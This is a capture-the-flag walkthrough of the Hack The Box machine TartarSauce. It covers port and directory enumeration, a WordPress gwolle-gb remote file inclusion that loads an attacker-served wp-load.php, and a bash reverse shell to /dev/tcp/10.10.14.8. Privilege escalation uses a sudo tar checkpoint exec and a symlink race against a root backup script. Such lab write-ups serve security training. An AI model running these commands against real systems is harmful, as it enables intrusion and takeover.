TartarSauce

Enumeration

As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.

The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.88 -oN allPorts

  • -sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.

  • --min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.

  • -p- scanning the entire port range, from 1 to 65535.

  • -T5 insane mode, it is the fastest mode of the nmap time template.

  • -Pn assume the host is online.

  • -n scan without reverse DNS resolution.

  • -oN save the scan result into a file, in this case the allports file.

Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:

nmap -sC -sV -p80 10.10.10.88 -oN targeted

  • -sC performs the scan using the default set of scripts.

  • -sV enables version detection.

  • -oN save the scan result into file, in this case the targeted file.

Let's take a look at the website.

Not much going on. As we can see in the nmap scan, there is a robots.txt file, let's take a look at it.

We see a bunch of subdirectories of the /webservices directory. Let's try to fuzz directories with gobuster.

gobuster dir -u http://10.10.10.88/webservices -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 200

  • dir enumerates directories or files.

  • -u the target URL.

  • -w path to the wordlist.

  • -t number of current threads, in this case 200 threads.

Let's take a look at the /webservices/wp directory.

As we can see, it looks pretty awful. If we take a look at the source code, we'll see that the website is tying to load resources from tartarsauce.htb. Let's add the domain name to the /etc/hosts file.

nano /etc/hosts

Now it should look a bit better.

As the website has the WordPress CMS, I tried to enumerate WordPress plugins with gobuster.

gobuster dir -u http://10.10.10.88/webservices/wp -w /usr/share/SecLists/Discovery/Web-Content/CMS/wp-plugins.fuzz.txt -t 200

  • dir enumerates directories or files.

  • -u the target URL.

  • -w path to the wordlist.

  • -t number of current threads, in this case 200 threads.

There is the gwolle-gb plugin. Let's search for common vulnerabilities associated with that plugin.

searchsploit gwolle

Exploitation

As we can see, there is one Remote File Inclusion vulnerability that we can exploit.

circle-info

Remote file inclusion is an attack targeting vulnerabilities in web applications that dynamically reference external scripts. The perpetrator's goal is to exploit the referencing function in an application to upload malware from a remote URL located within a different domain.

If we take a look at the exploitarrow-up-right, we'll see that if we set the abspath parameter to our HTTP server, it will try to load a file called wp-load.php. So if we create a malicious file with that name, and then make it send us a reverse shell, when we indicate our HTTP server, the file will be executed, and we'll be able to get a reverse shell.

nano wp-load.php

Now, let's set a simple HTTP server with python on port 80.

python -m http.server 80

Then, let's set a netcat listener on port 4444.

nc -lvnp 4444

  • -l listen mode.

  • -v verbose mode.

  • -n numeric-only IP, no DNS resolution.

  • -p specify the port to listen on.

Finally, if we make a request to the following URL, the wp-load.php file should be executed, and we should get the reverse shell as the www-data user.

curl 'http://tartarsauce.htb/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://10.10.14.8/'

Privilege Escalation

First, let's set an interactive TTY shell.

script /dev/null -c /bin/bash

Then I press Ctrl+Z and execute the following command on my local machine:

stty raw -echo; fg

reset

Terminal type? xterm

Next, I export a few variables:

export TERM=xterm

export SHELL=bash

Finally, I run the following command in our local machine:

stty size

And set the proper dimensions in the victim machine:

stty rows 51 columns 236

If we list the sudo privileges of the www-data user, we'll see that we can execute tar as the onuma user.

sudo -l

In the site GTFOBinsarrow-up-right, we can see a way of getting a shell as the onuma user.

sudo -u onuma tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash

To get a more interactive shell, let's set another netcat listener on port 4444.

nc -lvnp 4444

And send another reverse shell as the onuma user.

bash -i >& /dev/tcp/10.10.14.8/4444 0>&1

Now, let's set an interactive TTY shell with the same way as before. Once we have an interactive TTY, we could see if there is any scheduled task with the pspy tool. Let's transfer the 32 bytes version to the machine, on the /tmp directory.

cd /tmp

nc -lvnp 5555 > pspy32

On our local machine.

nc 10.10.10.88 5555 < pspy32

Then, give the binary execution permissions.

chmod +x pspy32

And finally execute it.

./pspy32

We can see that root is executing the /usr/sbin/backuperer file. Let's take a look at it.

Basically, the bash script is compressing the /var/www/html directory, then it stores the compressed file in the /var/tmp directory. Then, it waits for 30 seconds, and then it decompresses the file in the /var/tmp/check directory. And finally, it compares the original /var/www/html with the one it just has been decompressed, if there are any differences, it will put them in the /var/backups/onuma_backup_error.txt file. The idea here is to compress the /var/www/html directory into the compressed.tar file.

tar -zcvf compressed.tar /var/www/html/

  • -z filter the archive through gzip.

  • -c create new archive.

  • -v verbose mode.

  • -f specific file.

Then, send the file to our local machine.

nc -lvnp 5555 > compressed.tar

On the victim machine.

nc 10.10.10.88 5555 < compressed.tar

Then decompress the file on the local machine.

tar -zxvf compressed.tar /var/www/html/

  • -z filter the archive through gzip.

  • -x extract the archive.

  • -v verbose mode.

  • -f specific file.

And then, make a symbolic link from the var/www/html/index.html to /root/root.txt, so we can see the root flag.

ln -s -f /root/root.txt var/www/html/index.html

  • -s make a symbolic link.

  • -f force.

And then compress again the var/www/html directory to the compressed-mod.tar file.

tar -zcvf compressed-mod.tar var/www/html/

And transfer it to the victim machine.

nc -lvnp 5555 > compressed-mod.tar

On our local machine.

nc 10.10.10.88 5555 < compressed-mod.tar

Finally, I made this bash script which will detect when the temporary compressed file is made, and then it replaces it with the one we just made.

Now, let's execute it.

chmod +x exploit.sh

./exploit.sh

Now, all we have to do is read the /var/backups/onuma_backup_error.txt file, and reap the harvest and take the root flag.

Last updated

Was this helpful?